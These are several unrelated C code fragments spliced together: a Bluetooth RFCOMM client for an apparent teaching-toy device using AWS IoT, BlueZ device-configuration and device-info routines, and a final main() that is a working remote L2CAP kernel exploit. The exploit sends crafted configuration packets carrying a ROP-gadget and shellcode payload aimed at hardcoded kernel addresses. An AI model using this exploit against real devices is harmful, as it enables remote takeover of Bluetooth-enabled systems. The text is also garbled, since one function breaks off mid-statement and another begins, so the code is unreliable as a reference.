sdp_list_t *proto_list;
// get a list of the protocol sequences
if( sdp_get_access_protos( rec, &proto_list ) == 0 ) {
sdp_list_t *p = proto_list;
// go through each protocol sequence
for( ; p ; p = p->next ) {
sdp_list_t *pds = (sdp_list_t*)p->data;
// go through each protocol list of the protocol sequence
for( ; pds ; pds = pds->next ) {
// check the protocol attributes
sdp_data_t *d = (sdp_data_t*)pds->data;
int proto = 0;
for( ; d; d = d->next ) {
switch( d->dtd ) {
case SDP_UUID16:
case SDP_UUID32:
case SDP_UUID128:
proto = sdp_uuid_to_proto( &d->val.uuid );
break;
case SDP_UINT8:
if( proto == RFCOMM_UUID ) {
printf("rfcomm channel: %d\n",d->val.int8);
loco_channel = d->val.int8;
foundit = 1;
}
break;
}
}
}
sdp_list_free( (sdp_list_t*)p->data, 0 );
}
sdp_list_free( proto_list, 0 );
}
if (loco_channel > 0)
break;
}
printf("No of Responses %d\n", responses);
if ( loco_channel > 0 && foundit == 1 ) {
printf("Found service on this device, now gonna blast it with dummy data\n");
s = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM);
loc_addr.rc_family = AF_BLUETOOTH;
loc_addr.rc_channel = loco_channel;
loc_addr.rc_bdaddr = *(&target);
status = connect(s, (struct sockaddr *)&loc_addr, sizeof(loc_addr));
if( status < 0 ) {
perror("uh oh");
}
rc = pthread_create(&blueThread, NULL, threadListen, (void *)s);
if (rc){
printf("ERROR: %d\n", rc);
exit(1);
}
MQTTSubscribeParams subParams = MQTTSubscribeParamsDefault;
//Loop through trying to subscribe to AWS incase the first attempt fails, so will keep trying until the app sends the edison proper network info.
do{
INFO("Connecting...");
rc = aws_iot_mqtt_connect(&connectParams);
if (NONE_ERROR != rc) {
ERROR("Error(%d) connecting to %s:%d", rc, connectParams.pHostURL, connectParams.port);
}
subParams.mHandler = MQTTcallbackHandler;
subParams.pTopic = "Bear/Curriculum/Response";
subParams.qos = QOS_0;
if (NONE_ERROR == rc) {
INFO("Subscribing...");
rc = aws_iot_mqtt_subscribe(&subParams);
if (NONE_ERROR != rc) {
ERROR("Error subscribing");
}
}
sleep(1);
}while(NONE_ERROR != rc);
aws_flag = 1;
//////////////////////////Start of teaching stuff//////////////////////////////////////////
do {
if(changeTopic_flag){
sprintf(cPayload, "{\"BearID\":\"%s\"}",BEARID);
Msg.PayloadLen = strlen(cPayload) + 1;
CurriculumParams.MessageParams = Msg;
rc = aws_iot_mqtt_publish(&CurriculumParams);
while(rc == NONE_ERROR && changeTopic_flag){
rc = aws_iot_mqtt_yield(100);
INFO("-->sleep");
sleep(1);
}
changeTopic_flag = 0;
}
fp_Setting = fopen("/Curriculum/BearSettings.txt", "r");
fgets(language, sizeof(language), fp_Setting);
fgets(mode, sizeof(mode), fp_Setting);
fgets(topic, sizeof(topic), fp_Setting);
fgets(topicLen, sizeof(topicLen), fp_Setting);
language[strlen(language)-1] = 0;
mode[strlen(mode)-1] = 0;
topic[strlen(topic)-1] = 0;
topicLen[strlen(topicLen)-1] = 0;
fclose(fp_Setting);
//Wait for the tablet to tell the edison to start the lesson
while(strcmp(threadMessage, "learning")){
printf("Waiting for learning, got: %s\n", threadMessage);
if(!strcmp(threadMessage, "crash")){
memset(threadMessage, 0, sizeof(threadMessage));
goto CRASHED;
}
memset(threadMessage, 0, sizeof(threadMessage));
sleep(1);
}
printf("Current Mode: %s\n", mode);
printf("Current Language: %s\n", language);
printf("Current topic: %s\n", topic);
//Call a different function depending on what teaching mode it is, also write to the tablet based on the topic info and lesson
if(!strcmp(mode, "Repeat After Me")){
sprintf(message_Buffer,"%s,1,%s",language, topicLen);
status = write(s,message_Buffer,sizeof(message_Buffer));
if(!strcmp(language, "English")){
status = repeat_after_me_english(s, topic, MetricsParams, BearButton);
}
else{
status = repeat_after_me_foreign(s, language, topic, MetricsParams, BearButton);
}
}
else if(!strcmp(mode, "English to Foreign")){
sprintf(message_Buffer,"%s,3,%s",language, topicLen);
status = write(s,message_Buffer,sizeof(message_Buffer));
status = english_to_foreign(s, language, topic, MetricsParams, BearButton);
}
else if(!strcmp(mode, "Foreign to English")){
sprintf(message_Buffer,"%s,2,%s",language, topicLen);
status = write(s,message_Buffer,sizeof(message_Buffer));
status = foreign_to_english(s, language, topic, MetricsParams, BearButton);
}
changeTopic_flag = 1;
printf("Changing Topic");
sleep(5);
} while (status > 0);
CRASHED:
printf("\nBluetooth Disconnected\n");
close(s);
sdp_record_free( rec );
}
sdp_close(session);
if (loco_channel > 0) {
goto sdpconnect;
//break;
}
sleep(1);
} while (1);
printf("Exiting...\n");
}
static void configure_device(int dev_id)
{
struct device_opts *device_opts;
struct hci_dev_req dr;
struct hci_dev_info di;
char mode[14];
int dd;
device_opts = get_device_opts(dev_id);
if (hci_devinfo(dev_id, &di) < 0)
return;
if (hci_test_bit(HCI_RAW, &di.flags))
return;
/* Set default discoverable timeout if not set */
if (!(device_opts->flags & (1 << HCID_SET_DISCOVTO)))
device_opts->discovto = HCID_DEFAULT_DISCOVERABLE_TIMEOUT;
/* Set scan mode */
if (read_device_mode(&di.bdaddr, mode, sizeof(mode)) == 0) {
if (!strcmp(mode, "off") && hcid.offmode == HCID_OFFMODE_NOSCAN) {
device_opts->mode = MODE_OFF;
device_opts->scan = SCAN_DISABLED;
} else if (!strcmp(mode, "connectable")) {
device_opts->mode = MODE_CONNECTABLE;
device_opts->scan = SCAN_PAGE;
} else if (!strcmp(mode, "discoverable")) {
/* Set discoverable only if timeout is 0 */
if (!get_discoverable_timeout(dev_id)) {
device_opts->scan = SCAN_PAGE | SCAN_INQUIRY;
device_opts->mode = MODE_DISCOVERABLE;
} else {
device_opts->scan = SCAN_PAGE;
device_opts->mode = MODE_CONNECTABLE;
}
} else if (!strcmp(mode, "limited")) {
/* Set discoverable only if timeout is 0 */
if (!get_discoverable_timeout(dev_id)) {
device_opts->scan = SCAN_PAGE | SCAN_INQUIRY;
device_opts->mode = MODE_LIMITED;
} else {
device_opts->scan = SCAN_PAGE;
device_opts->mode = MODE_CONNECTABLE;
}
}
}
/* Do configuration in the separate process */
switch (fork()) {
case 0:
atexit(at_child_exit);
break;
case -1:
error("Fork failed. Can't init device hci%d: %s (%d)",
dev_id, strerror(errno), errno);
default:
return;
}
dd = hci_open_dev(dev_id);
if (dd < 0) {
error("Can't open device hci%d: %s (%d)",
dev_id, strerror(errno), errno);
exit(1);
}
memset(&dr, 0, sizeof(dr));
dr.dev_id = dev_id;
/* Set packet type */
if ((device_opts->flags & (1 << HCID_SET_PTYPE))) {
dr.dev_opt = device_opts->pkt_type;
if (ioctl(dd, HCISETPTYPE, (unsigned long) &dr) < 0) {
error("Can't set packet type on hci%d: %s (%d)",
dev_id, strerror(errno), errno);
}
}
/* Set link mode */
if ((device_opts->flags & (1 << HCID_SET_LM))) {
dr.dev_opt = device_opts->link_mode;
if (ioctl(dd, HCISETLINKMODE, (unsigned long) &dr) < 0) {
error("Can't set link mode on hci%d: %s (%d)",
dev_id, strerror(errno), errno);
}
}
/* Set link policy */
if ((device_opts->flags & (1 << HCID_SET_LP))) {
dr.dev_opt = device_opts->link_policy;
if (ioctl(dd, HCISETLINKPOL, (unsigned long) &dr) < 0) {
error("Can't set link policy on hci%d: %s (%d)",
dev_id, strerror(errno), errno);
}
}
/* Set device name */
if ((device_opts->flags & (1 << HCID_SET_NAME)) && device_opts->name) {
change_local_name_cp cp;
memset(cp.name, 0, sizeof(cp.name));
expand_name((char *) cp.name, sizeof(cp.name),
device_opts->name, dev_id);
hci_send_cmd(dd, OGF_HOST_CTL, OCF_CHANGE_LOCAL_NAME,
CHANGE_LOCAL_NAME_CP_SIZE, &cp);
}
/* Set device class */
if ((device_opts->flags & (1 << HCID_SET_CLASS))) {
write_class_of_dev_cp cp;
uint32_t class;
uint8_t cls[3];
if (read_local_class(&di.bdaddr, cls) < 0) {
class = htobl(device_opts->class);
cls[2] = get_service_classes(&di.bdaddr);
memcpy(cp.dev_class, &class, 3);
} else {
if (!(device_opts->scan & SCAN_INQUIRY))
void extra_info(int dd, int dev_id, bdaddr_t* bdaddr)
{
uint16_t handle, offset;
uint8_t features[8], max_page = 0;
char name[249], *tmp;
char addr[19] = { 0 };
uint8_t mode, afh_map[10];
struct hci_version version;
struct hci_dev_info di;
struct hci_conn_info_req *cr;
int i, cc = 0;
if (hci_devinfo(dev_id, &di) < 0) {
perror("Can't get device info");
exit(1);
}
printf("Requesting information ...\n");
cr = malloc(sizeof(*cr) + sizeof(struct hci_conn_info));
if (!cr) {
perror("Can't get connection info");
exit(1);
}
bacpy(&cr->bdaddr, bdaddr);
cr->type = ACL_LINK;
if (ioctl(dd, HCIGETCONNINFO, (unsigned long) cr) < 0) {
if (hci_create_connection(dd, bdaddr,
htobs(di.pkt_type & ACL_PTYPE_MASK),
0, 0x01, &handle, 25000) < 0) {
perror("Can't create connection");
return;
}
sleep(1);
cc = 1;
} else
handle = htobs(cr->conn_info->handle);
ba2str(bdaddr, addr);
printf("\tBD Address: %s\n", addr);
if (hci_read_remote_name(dd, bdaddr, sizeof(name), name, 25000) == 0)
printf("\tDevice Name: %s\n", name);
if (hci_read_remote_version(dd, handle, &version, 20000) == 0) {
char *ver = lmp_vertostr(version.lmp_ver);
printf("\tLMP Version: %s (0x%x) LMP Subversion: 0x%x\n"
"\tManufacturer: %s (%d)\n",
ver ? ver : "n/a",
version.lmp_ver,
version.lmp_subver,
bt_compidtostr(version.manufacturer),
version.manufacturer);
if (ver)
bt_free(ver);
}
memset(features, 0, sizeof(features));
hci_read_remote_features(dd, handle, features, 20000);
if ((di.features[7] & LMP_EXT_FEAT) && (features[7] & LMP_EXT_FEAT))
hci_read_remote_ext_features(dd, handle, 0, &max_page,
features, 20000);
printf("\tFeatures%s: 0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x "
"0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x\n",
(max_page > 0) ? " page 0" : "",
features[0], features[1], features[2], features[3],
features[4], features[5], features[6], features[7]);
tmp = lmp_featurestostr(features, "\t\t", 63);
printf("%s\n", tmp);
bt_free(tmp);
for (i = 1; i <= max_page; i++) {
if (hci_read_remote_ext_features(dd, handle, i, NULL,
features, 20000) < 0)
continue;
printf("\tFeatures page %d: 0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x "
"0x%2.2x 0x%2.2x 0x%2.2x 0x%2.2x\n", i,
features[0], features[1], features[2], features[3],
features[4], features[5], features[6], features[7]);
}
if (hci_read_clock_offset(dd, handle, &offset, 1000) < 0) {
perror("Reading clock offset failed");
exit(1);
}
printf("\tClock offset: 0x%4.4x\n", btohs(offset));
if(hci_read_afh_map(dd, handle, &mode, afh_map, 1000) < 0) {
perror("HCI read AFH map request failed");
}
if(mode == 0x01) {
// DGS: Replace with call to btbb_print_afh_map - need a piconet
printf("\tAFH Map: 0x");
for(i=0; i<10; i++)
printf("%02x", afh_map[i]);
printf("\n");
} else {
printf("AFH disabled.\n");
}
free(cr);
if (cc) {
usleep(10000);
hci_disconnect(dd, handle, HCI_OE_USER_ENDED_CONNECTION, 10000);
}
}
// MAIN PART
int main(int argc, char *argv[])
{
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 laddr, raddr;
struct hci_dev_info di;
char *buf, *remote_address = NULL;
char payload[] ="\x40\x00\x00\x00\x06\x10\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
char payload2[]="\x01\x00\x40\x00";
char payload3[212] = {
0x40, 0x00, 0x00,
0x00, 0x04, 0x00,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x07,
0x01, 0x02, 0xd0, 0x01,
0x01, 0x02, 0xd0, 0x02,
0x01, 0x02, 0xd0, 0x03,
0x01, 0x02, 0xd0, 0x04,
0x01, 0x02, 0x26, 0xc1, //pop, pop, ret Gadget 0xc1260201
0x06, 0x10, 0x01, 0x00,
0xff, 0xff, 0xff, 0xff,
0x6e, 0xb4, 0x97, 0xc1, //call esp Gadget 0xc197b46e
0x90, 0x90, 0x90, 0x90,
0xeb, 0x06,
0x06, 0x10, 0x01, 0x00,
0xeb, 0x44, 0xb8, 0x04,
0x00, 0x00, 0x00, 0xbb,
0x01, 0x00, 0x00, 0x00,
0xeb, 0x04,
0x06, 0x10, 0x01, 0x00,
0x89, 0xe5, 0x68, 0x01,
0x36, 0x43, 0x00, 0x54, //push C on Stack
0x89, 0xe1, 0x90, 0x90,
0xeb, 0x04,
0x06, 0x10, 0x01, 0x00,
0xb8, 0x03, 0x78, 0x10, //print_k 0xc1107803
0xc1, 0xff, 0xd0, 0xbb,
0x04, 0x00, 0x00, 0x00,
0xeb, 0x04,
0x06, 0x10, 0x01, 0x00,
0xb8, 0x30, 0xec, 0x09, //0xc109ec30 msleep_interruptible()
0xc1, 0xff, 0xd0, 0x90,
0x90, 0x90, 0x90, 0x90,
0xeb, 0x04,
0x06, 0x10, 0x01, 0x00,
0xe8, 0xd4, 0xff, 0xff,
0xff, 0x48, 0x65, 0x6c,
0x6c, 0x6f, 0x2c, 0x20,
0xeb, 0x04,
0x06, 0x10, 0x01, 0x00,
0x57, 0x67, 0x72, 0x6c,
0x64, 0x21, 0x00, 0x90,
0x09, 0x09, 0x90, 0x90,
0x90, 0x90,
};
int sock, c, i;
int l2_code;
int l2_ident;
int l2_hsize;
while ((c = getopt (argc, argv, "a:")) != -1)
{
switch (c)
{
case 'a':
remote_address = optarg;
break;
default:
usage();
break;
}
}
if(remote_address == NULL)
{
printf(">>> I need at least a remote btaddr...\n\n");
usage();
exit(EXIT_FAILURE);
}
// Get local device info
if(hci_devinfo(0, &di) < 0)
{
perror("HCI device info failed");
exit(EXIT_FAILURE);
}
printf("Local device %s\n", batostr(&di.bdaddr));
printf("Remote device %s\n", remote_address);
/* Construct local addr */
laddr.l2_family = AF_BLUETOOTH;
laddr.l2_bdaddr = di.bdaddr;
laddr.l2_psm = htobs(0x1001);
laddr.l2_cid = htobs(0x0040);
/* Construct remote addr */
memset(&raddr, 0, sizeof(raddr));
raddr.l2_family = AF_BLUETOOTH;
str2ba(remote_address, &raddr.l2_bdaddr);
/* Create a Bluetooth raw socket */
if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
perror("socket");
exit(EXIT_FAILURE);
}
/* ...and bind it to the local device */
bind(sock, (struct sockaddr *) &laddr, sizeof(laddr));
/* Let's try to connect */
if (connect(sock, (struct sockaddr *) &raddr, sizeof(raddr)) < 0) {
perror("connect");
exit(EXIT_FAILURE);
}
/* Init packet buffer */
if( ! (buf = (char *) malloc (L2CAP_CMD_HDR_SIZE )) ) {
perror("malloc");
exit(EXIT_FAILURE);
}
/* Set L2CAP header properties */
cmd = (l2cap_cmd_hdr *) buf;
cmd->code = 0x02;
cmd->ident = 0x03;
cmd->len = htobs(4);
/* Copy payload after l2cap header */
memcpy((buf + L2CAP_CMD_HDR_SIZE), payload2, 4);
/* Throw the packet into the air */
if(send(sock, buf, L2CAP_CMD_HDR_SIZE + 4, 0) <= 0)
{
perror("send");
}
printf("L2CAP packet was sent\n");
sleep(1);
/* Init packet buffer */
if( ! (buf = (char *) malloc (L2CAP_CMD_HDR_SIZE + 22)) ) {
perror("malloc");
exit(EXIT_FAILURE);
}
/* Set L2CAP header properties */
cmd = (l2cap_cmd_hdr *) buf;
cmd->code = 0x04;
cmd->ident = 0x01;
cmd->len = htobs(22);
/* Copy payload after l2cap header */
memcpy((buf + L2CAP_CMD_HDR_SIZE), payload, 22);
/* Throw the packet into the air */
if(send(sock, buf, L2CAP_CMD_HDR_SIZE + 22, 0) <= 0)
{
perror("send");
}
printf("L2CAP packet 2 was sent\n");
sleep(1);
/* Init packet buffer */
if( ! (buf = (char *) malloc (L2CAP_CMD_HDR_SIZE + 212)) ) {
perror("malloc");
exit(EXIT_FAILURE);
}
/* Set L2CAP header properties */
cmd = (l2cap_cmd_hdr *) buf;
cmd->code = 0x05;
cmd->ident = 0x01;
cmd->len = htobs(212);
/* Copy payload after l2cap header */
memcpy((buf + L2CAP_CMD_HDR_SIZE), payload3,212);
/* Throw the packet into the air */
if(send(sock, buf, L2CAP_CMD_HDR_SIZE +212, 0) <= 0)
{
perror("send");
}
printf("L2CAP packet 3 was sent\n");
/* Disconnect */
close(sock);
return EXIT_SUCCESS;
}
